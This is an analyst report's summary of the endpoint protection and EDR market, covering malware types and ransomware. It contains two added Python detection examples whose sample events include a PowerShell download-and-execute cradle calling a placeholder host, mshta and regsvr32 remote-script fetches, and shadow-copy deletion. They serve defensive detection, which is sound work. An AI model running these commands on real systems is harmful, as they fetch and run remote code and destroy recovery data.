1 Management Summary
The KuppingerCole Market Compass provides an overview of a market segment and the vendors in the Endpoint Protection, Detection & Response (EPDR) market. It covers the trends that are influencing this market segment and the essential capabilities required of solutions in this space. It also provides ratings of how well these solutions meet our expectations. This report covers the previously distinct but converging fields and product lines of Endpoint Protection (EPP) and Endpoint Detection & Response (EDR).
Malware comes in many forms: viruses, worms, rootkits, botnets, file-less malware, ransomware, and crypto-miners are prevalent in the wild. Malware typically gains its foothold either by exploiting an operating system or application vulnerability or by tricking a user into running it; once executing, it abuses whatever privileges the compromised account or process already has.
Viruses are far more sophisticated than they were decades ago. Most are now polymorphic, meaning they alter their code or encoding with each new copy so that no fixed signature matches every instance. Viruses infect files and usually need user interaction, such as opening an infected document or program, to initiate a compromise.
Worms spread across networks without user interaction, exploiting unpatched, vulnerable network-facing applications and exposed ports.
Rootkits are low-level malware, typically implemented as kernel drivers or modules or by hooking operating system interfaces, that hide their own presence and give bad actors persistent, privileged control of affected machines.
Botnets are collections of compromised devices, each running a bot agent that takes orders from a command-and-control channel (sometimes hidden by a rootkit), that are used in large numbers to magnify other kinds of attacks, such as Distributed Denial of Service (DDoS) attacks, credential stuffing, account take-overs (ATOs), or other forms of cybercrime. Botnets can be composed of PCs, servers, smartphones, IoT devices, etc.
File-less malware is a malicious innovation that seeks to avoid signature-based anti-malware scanners by never landing on disk as a conventional executable. Instead, it runs in memory, typically via process or memory injection, and spreads between machines the same way. Once on a target device, file-less malware uses native tools like PowerShell, WMI, or .NET to assemble and execute the malicious payload, so the artefacts an investigator finds are command lines, scripts, and in-memory code rather than a file that can be hashed and blocked. File-less malware attacks are on the rise.
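Because file-less activity leaves command lines rather than files behind, EDR detection for it is largely command-line and process-lineage analysis. The following is an added example, not code from the KuppingerCole report or from any vendor product: a small rule set that scores constructed Windows process-creation records (the `EVENTS` list is made up for this example, and `example.invalid` is a reserved non-resolving domain) for encoded PowerShell, download-and-execute cradles, Office applications spawning script hosts, and proxy execution through `mshta.exe`/`regsvr32.exe`/`rundll32.exe`, and tags each finding with the MITRE ATT&CK technique IDs it corresponds to. The rule thresholds and field names are assumptions for illustration, not any product's schema.

```python
"""Added example, not from the KuppingerCole report or any vendor product:
a minimal EDR-style rule set for living-off-the-land / file-less activity.
It scores constructed Windows process-creation events (the records in EVENTS
are made up for this example) and maps each finding to MITRE ATT&CK IDs."""
import base64
import re

# MITRE ATT&CK technique IDs referenced by the rules below.
PS_EXEC = "T1059.001"        # Command and Scripting Interpreter: PowerShell
OBFUSCATION = "T1027"        # Obfuscated Files or Information
INGRESS_TOOL = "T1105"       # Ingress Tool Transfer
PHISH_ATTACH = "T1566.001"   # Phishing: Spearphishing Attachment
USER_EXEC = "T1204.002"      # User Execution: Malicious File
PROXY_EXEC = {               # System Binary Proxy Execution sub-techniques
    "mshta.exe": "T1218.005", "regsvr32.exe": "T1218.010", "rundll32.exe": "T1218.011"}

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# -EncodedCommand (or one of its abbreviations) followed by a base64 blob.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Hallmarks of in-memory staging: (label, pattern, ATT&CK technique).
TOKEN_RULES = [
    ("download cradle",
     r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\bhttps?://", INGRESS_TOOL),
    ("in-memory execution", r"\bIEX\b|Invoke-Expression", PS_EXEC),
    ("hidden window", r"-w(?:indowstyle)?\s+hidden", PS_EXEC),
    ("profile/interaction suppressed", r"-nop\b|-noprofile\b|-noninteractive\b", PS_EXEC),
    ("inline base64 decoding", r"FromBase64String", OBFUSCATION),
]


def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload (base64 of UTF-16LE) as text,
    "" if a blob is present but undecodable, or None if there is no blob."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze(event):
    """Score one process-creation event; return a finding dict or None."""
    image, parent = event["image"].lower(), event["parent"].lower()
    cmdline = event["cmdline"]
    techniques, reasons = set(), []

    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        techniques.update({OBFUSCATION, PS_EXEC})
        reasons.append("encoded PowerShell command")
    # Inspect the visible command line plus whatever was hidden in the blob.
    text = cmdline + " " + (decoded or "")
    for label, pattern, technique in TOKEN_RULES:
        if re.search(pattern, text, re.I):
            techniques.add(technique)
            reasons.append(label)
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        techniques.update({PHISH_ATTACH, USER_EXEC})
        reasons.append(f"{parent} spawned {image}")
    if image in PROXY_EXEC and re.search(r"https?://", cmdline, re.I):
        techniques.add(PROXY_EXEC[image])
        reasons.append(f"{image} fetching remote content")

    if not techniques:
        return None
    return {"pid": event["pid"], "image": image, "score": len(reasons),
            "techniques": sorted(techniques), "reasons": reasons, "decoded": decoded}


def run(events):
    """Return findings for every event that tripped at least one rule."""
    return [f for f in (analyze(e) for e in events) if f]


# Constructed stage-one payload of the kind hidden behind -EncodedCommand.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
ENCODED = base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii")

EVENTS = [  # constructed sample telemetry, loosely modelled on Sysmon Event ID 1
    {"pid": 4120, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"pid": 4200, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\nightly-backup.ps1"},  # benign admin script
    {"pid": 4300, "parent": "WINWORD.EXE", "image": "mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/invoice.hta"},
    {"pid": 4400, "parent": "explorer.exe", "image": "regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://example.invalid/x.sct scrobj.dll"},
]

if __name__ == "__main__":
    for finding in run(EVENTS):
        print(finding["pid"], finding["image"], finding["techniques"], finding["reasons"])
```

The decoded blob is kept in the finding because the analyst needs to see the actual cradle, not just the fact that something was encoded. In production the same rules would be fed by the sensor's process-creation stream and joined with parent-process lineage over more than one hop; the benign backup script shows why the rules key on behaviour (hidden window, encoding, download cradle, Office parent) rather than on the mere presence of `powershell.exe`.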
Ransomware attacks are still popular and evolving. Ransomware is a form of malware that either locks users’ screens or, now more commonly, encrypts users’ data, demanding that a ransom be paid for the return of control or for decryption keys. The newest ransomware operations are run like an APT campaign, with ransomware staged on machines throughout an enterprise and data exfiltrated before the ransomware is detonated, so that victims who restore from backup can still be extorted with the threat of publication. Needless to say, paying the ransom only emboldens the perpetrators and perpetuates the ransomware problem. Over the last couple of years, attackers have also used ransomware techniques and payloads for purely destructive purposes: rather than asking for a ransom, these destructive “wiper” malware types simply delete or overwrite data.
Much of the cybersecurity industry has, in recent years, shifted focus to detection and response rather than prevention. However, in the case of ransomware and wipers, detection after the fact is trivial: the malware announces its presence as soon as it has finished with a device, by which point detection no longer helps. That leaves the user to deal with the aftermath. Once infected, the choices are to:
- Pay the ransom and hope that the malefactors return control or send working decryption keys (not recommended, and it doesn’t always work)
- Wipe the machine and restore data from backup
- In the case of wipers, there is no choice but to restore from backup.
Restoration is sometimes problematic if users or organizations haven’t been keeping up with backups, or if the backups themselves were reachable from the compromised machine and were encrypted or deleted along with the data. Even if backups are readily available, time will be lost in cleaning up the compromised computer and restoring the data. Thus, preventing ransomware infections is preferred. However, no anti-malware product is 100% effective at prevention. It is still necessary to have good, tested backup/restore processes, with at least one copy kept offline or otherwise out of reach of the credentials a ransomware process would run with, for cases where anti-malware fails.
Most ransomware attacks arrive as weaponized Office documents via phishing campaigns. Disabling macros can help, but this is not universally effective since many users need legitimate macros; restricting macros to signed or trusted sources, or blocking them in documents downloaded from the internet, is a workable middle ground. Less commonly, ransomware also arrives via drive-by downloads and malvertising.
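Since signature-based prevention will sometimes miss a new ransomware build, the EDR side of an EPDR product has to catch the behaviour of encryption itself early enough to limit the damage, and then act on it with the automated responses described later in this summary (shutting down offending processes, quarantining files, isolating assets). The following is an added example, not code from the KuppingerCole report or any vendor product: a behavioural detector that replays constructed file and process telemetry (the events from `sample_events()` are made up for this example) and alerts on the three classic tells of a ransomware run: shadow-copy deletion before encryption, a burst of high-entropy writes and extension changes on user documents, and any touch of a decoy "canary" file that no legitimate process should ever modify. The response action names, the canary path, the entropy threshold, and the event field names are assumptions for illustration.

```python
"""Added example, not from the KuppingerCole report or any vendor product:
a behavioural ransomware detector of the kind an EDR agent runs over file and
process telemetry, together with the (simulated) response it would trigger.
Every event used here is constructed for the example."""
import hashlib
import math
import os
import re
from collections import defaultdict, deque

DATA_ENCRYPTED = "T1486"    # ATT&CK: Data Encrypted for Impact
INHIBIT_RECOVERY = "T1490"  # ATT&CK: Inhibit System Recovery

DOC_EXT = {".docx", ".xlsx", ".pptx", ".pdf", ".jpg", ".txt"}
# Hypothetical decoy directory seeded with files no legitimate process touches.
CANARY_DIR = "C:\\Users\\Public\\Documents\\_canary\\"
ENTROPY_THRESHOLD = 7.0     # bits/byte; compressed or encrypted data sits near 8
SHADOW_RE = re.compile(
    r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete|"
    r"bcdedit(?:\.exe)?.*recoveryenabled\s+no", re.I)
RESPONSE = ["terminate_process", "quarantine_binary", "isolate_host"]  # simulated actions


def shannon_entropy(data):
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def _ext(path):
    return os.path.splitext(path)[1].lower()


def detect(events, window=10.0, threshold=5):
    """Replay events in time order; return one alert per (process, technique)."""
    recent = defaultdict(deque)   # pid -> timestamps of encryption-like file ops
    alerted, alerts = set(), []

    def alert(ev, technique, evidence):
        if (ev["pid"], technique) in alerted:
            return                # already acted on this process for this technique
        alerted.add((ev["pid"], technique))
        alerts.append({"pid": ev["pid"], "image": ev["image"], "ts": ev["ts"],
                       "techniques": [technique], "evidence": evidence,
                       "actions": list(RESPONSE)})

    for ev in sorted(events, key=lambda e: e["ts"]):
        op = ev["op"]
        if op == "exec":
            # Ransomware commonly kills recovery options before encrypting.
            if SHADOW_RE.search(ev.get("cmdline", "")):
                alert(ev, INHIBIT_RECOVERY, "shadow-copy deletion: " + ev["cmdline"])
            continue
        path = ev["path"]
        if path.startswith(CANARY_DIR):
            # Decoys catch throttled encryptors that stay under the rate threshold.
            alert(ev, DATA_ENCRYPTED, "canary file modified: " + path)
            continue
        high_entropy_write = (op == "write" and _ext(path) in DOC_EXT
                              and shannon_entropy(ev.get("data", b"")) > ENTROPY_THRESHOLD)
        ext_swap = (op == "rename" and _ext(path) in DOC_EXT
                    and _ext(ev["new_path"]) not in DOC_EXT)
        if high_entropy_write or ext_swap:
            q = recent[ev["pid"]]
            q.append(ev["ts"])
            while ev["ts"] - q[0] > window:   # slide the window forward
                q.popleft()
            if len(q) >= threshold:
                alert(ev, DATA_ENCRYPTED,
                      f"{len(q)} encryption-like file operations within {window}s")
    return alerts


# Constructed file contents: 4 KiB of hash output stands in for ciphertext.
HIGH_ENTROPY = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))
LOW_ENTROPY = b"Quarterly results: revenue up, costs flat. " * 100


def sample_events():
    """Constructed telemetry: a normal editor, a fast encryptor, a slow one."""
    ev = []
    for i in range(3):   # 1001: Word saving a few documents over half a minute
        ev.append({"ts": 10.0 * i, "pid": 1001, "image": "WINWORD.EXE", "op": "write",
                   "path": f"C:\\Users\\alice\\Documents\\draft{i}.docx", "data": LOW_ENTROPY})
    # 2002: deletes shadow copies, then bulk-encrypts and renames documents.
    ev.append({"ts": 100.0, "pid": 2002, "image": "invoice_scan.exe", "op": "exec",
               "cmdline": "vssadmin.exe delete shadows /all /quiet"})
    for i in range(6):
        p = f"C:\\Users\\alice\\Documents\\report{i}.docx"
        ev.append({"ts": 101.0 + 0.2 * i, "pid": 2002, "image": "invoice_scan.exe",
                   "op": "write", "path": p, "data": HIGH_ENTROPY})
        ev.append({"ts": 101.1 + 0.2 * i, "pid": 2002, "image": "invoice_scan.exe",
                   "op": "rename", "path": p, "new_path": p + ".locked"})
    # 3003: throttled encryptor, two files per window, but it hits the decoy.
    for i in range(2):
        ev.append({"ts": 200.0 + i, "pid": 3003, "image": "updater.exe", "op": "write",
                   "path": f"C:\\Users\\alice\\Documents\\budget{i}.xlsx", "data": HIGH_ENTROPY})
    ev.append({"ts": 205.0, "pid": 3003, "image": "updater.exe", "op": "write",
               "path": CANARY_DIR + "keep.docx", "data": HIGH_ENTROPY})
    return ev


if __name__ == "__main__":
    for a in detect(sample_events()):
        print(a["ts"], a["pid"], a["image"], a["techniques"], a["evidence"], a["actions"])
```

Two design points matter in practice. The rate rule fires on the fifth suspicious operation, so a handful of documents are lost before the process is terminated; that is the price of keeping false positives from legitimate compressors and backup agents down, and it is why the canary rule exists alongside it. The response list is deliberately ordered: killing the process and quarantining its binary are cheap and reversible, whereas network isolation of the host should be reserved for corroborated detections such as shadow-copy deletion followed by an encryption burst from the same process.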
Crypto-jacking is the unwanted execution of crypto-mining software on user devices. Crypto-jackers capitalized on the surge in cryptocurrency prices. Though cryptocurrency prices are down, crypto-jacking is still a threat to unprotected devices, annoying device owners with increased power costs and, in the case of mobile devices, depleted batteries. Initially, some anti-malware solutions did not identify crypto-mining software as malicious, since it could be built from freely available and sometimes legitimate code; what makes it malicious is not the code but the fact that it runs without the device owner’s consent.
All end-user computers, smartphones, and tablets should have anti-malware endpoint security clients installed, preferably with up-to-date subscriptions. Servers and virtual desktops should be protected as well. Windows platforms are still the most heavily targeted, though the amount of malware for Android is increasing. It is important to remember that Apple’s iOS and Mac devices are not immune from malware, and as market share increases, particularly for Mac devices, the amount of malware for that platform will increase too.
Endpoint Detection & Response solutions look for evidence and effects of malware that may have slipped past EPP products. EDR tools are also used to find signs of malicious insider activities such as data exfiltration attempts, left-behind accounts, and open ports. EDR solutions log activities centrally, allow administrators to examine endpoints remotely, and generate reports often complete with attribution theories and confidence levels.
Additionally, as part of the detection process, EDR solutions correlate endpoint telemetry with threat intelligence, perform event correlation, and support interactive querying, live memory analysis, and activity recording and playback. EDR helps to automatically uncover attacks and enables security teams to understand what is happening from start to finish by consolidating all relevant information into a single view.
For the response phase, EDR solutions can provide alerts and reports, create attribution theories with confidence levels, automatically update detection rules, shut down offending processes, delete or quarantine files, automatically quarantine (network-isolate) assets suspected of having been compromised, and even automatically roll back compromised endpoints to known-good states.
Like EPP, EDR solutions can be tightly integrated with other tools in vendor suites and can interoperate with security analytics tools.
A number of different, independent testing regimes exist that vendors can participate in to demonstrate the effectiveness of their products. AV-Comparatives, AV-Test, ICSALabs, and NSSLabs run tests focusing on malware detection and prevention. They also run in-depth tests to simulate the kinds of scenarios business users encounter. KuppingerCole reviewed test results as published by these organizations for vendors examined below.
The MITRE ATT&CK Framework is a knowledge base of the tactics, techniques, and procedures (TTPs) that adversaries have been observed using across the whole intrusion lifecycle, from initial access through to impact and data exfiltration. Many security vendors contribute to MITRE ATT&CK and many of their tools map detections to its techniques to facilitate analysis. MITRE has performed two full evaluation rounds emulating attacks by APT3 and APT29. These tests demonstrate the abilities of vendors’ EDR products (and services from MSSPs) to detect and alert on malicious behavior. Many vendors participated in these tests, particularly the most recent one based on APT29. The results of these emulated attacks and the effectiveness of vendor responses are considered and noted in this Market Compass. Such tests are point-in-time measurements, not absolute determinants of efficacy and value in customer environments. It is also possible and likely that individual deficiencies that were observed in vendor products have since been remedied.
This Market Compass covers solutions that contain capabilities found in both EPP and EDR products.